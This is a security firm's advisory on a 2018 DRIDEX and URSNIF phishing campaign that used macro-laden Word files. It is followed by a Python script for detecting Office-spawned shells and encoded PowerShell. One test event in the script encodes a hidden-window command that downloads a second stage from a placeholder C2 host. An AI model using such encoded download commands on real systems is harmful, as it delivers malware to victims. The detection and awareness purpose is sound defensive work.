Phishing Attacks Today: DRIDEX and URSNIF Are Back | Critical Start

Phishing Attacks Today: DRIDEX and URSNIF Are Back

On the morning of December 12th, 2018, the CRITICALSTART CYBERSOC began seeing the resurgence of a prolific phishing campaign. This campaign included malware variants such as DRIDEX and URSNIF, both common banking Trojans used in macro-based attacks. These files have been observed either hidden within macro-enabled documents or downloaded after the macro code executes and directs the host to reach out to a C2 domain.

While these aren't new techniques, the malicious files (and their variants) can still be very effective on unprotected devices. Within the existing tool suite the CRITICALSTART CYBERSOC operates on, we've seen the detection and remediation of these malicious files, specifically through EDR and NextGen AV platforms (machine learning algorithms).

This is a great time to verify the security controls across your organization and ensure your policies are up to date for both Endpoint Protection Platforms and Exchange/email. Additionally, user awareness is the most significant defense against phishing and similar attacks. Being transparent with the user base about how these attacks operate and disguise themselves creates vigilance and grows a culture of security awareness.

CRITICALSTART's CYBERSOC has seen this campaign across multiple MDR clients within the same time frame, over the last 24 hours.

  1. C2 Identifiers:
  1. Malware Observed:
    1. URSNIF “3152”
    2. DRIDEX “3101”
  1. Attributes: Identifiable through Exchange / Proofpoint
    1. PowerShell
    2. Office VBA Macro
    3. Banking Trojan
  1. Techniques: Identifiable through EDR and EPP agents locally on the device(s)
    1. Emailed Doc
    2. Word Requests “Enable Macros”
    3. Word spawns cmd.exe
    4. cmd.exe runs encoded PowerShell with C2 location
    5. Device pulls directed file (URSNIF/DRIDEX)
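
The technique chain above (Word spawns cmd.exe, which runs encoded PowerShell carrying the C2 location) can be checked against endpoint process-creation telemetry. The following is an added example, not CRITICALSTART's detection logic; the event field names (`host`, `parent`, `image`, `cmdline`), the sample events and the placeholder URL are assumptions constructed for illustration.

```python
import base64
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...) and -ec.
FLAG = re.compile(r"(?i)\s[-/](e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")
URL = re.compile(r"https?://[^\s'\")]+")

def decode_encoded_command(cmdline):
    """Return the decoded PowerShell script carried in cmdline, or None."""
    for flag, blob in FLAG.findall(cmdline):
        if "encodedcommand".startswith(flag.lower()) or flag.lower() == "ec":
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64 / UTF-16LE; keep looking
    return None

def triage(event):
    """Classify one process-creation event; return a finding dict or None."""
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if parent not in OFFICE or image not in SHELLS:
        return None  # not an Office application spawning a shell
    script = decode_encoded_command(event["cmdline"])
    return {
        "host": event["host"],
        "severity": "high" if script else "medium",
        "urls": URL.findall(script) if script else [],
    }

# Constructed sample events (not from the campaign); the URL is a placeholder.
_blob = base64.b64encode(
    "Invoke-WebRequest http://c2.example.invalid/stage2".encode("utf-16-le")).decode()
EVENTS = [
    {"host": "ws-01", "parent": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"cmd.exe /c powershell -w hidden -enc {_blob}"},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "ws-03", "parent": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ver"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["host"], triage(ev))
```

An Office parent spawning a shell is reported at medium severity even without an encoded command; decoding the Base64 argument surfaces the URL the host is being directed to, which can then be matched against proxy or DNS logs.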
